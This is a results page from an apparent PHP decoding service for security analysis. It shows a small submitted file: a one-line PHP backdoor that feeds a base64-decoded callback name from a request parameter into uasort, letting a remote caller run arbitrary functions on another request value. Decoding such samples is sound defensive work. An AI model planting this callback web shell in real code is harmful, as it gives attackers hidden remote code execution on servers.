Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, base64_de..
Decoded Output download
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));
?>
Did this file decode correctly?
Original Code
<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 872264d007f2a46f594ad67f42fc2656 |
Eval Count | 0 |
Decode Time | 115 ms |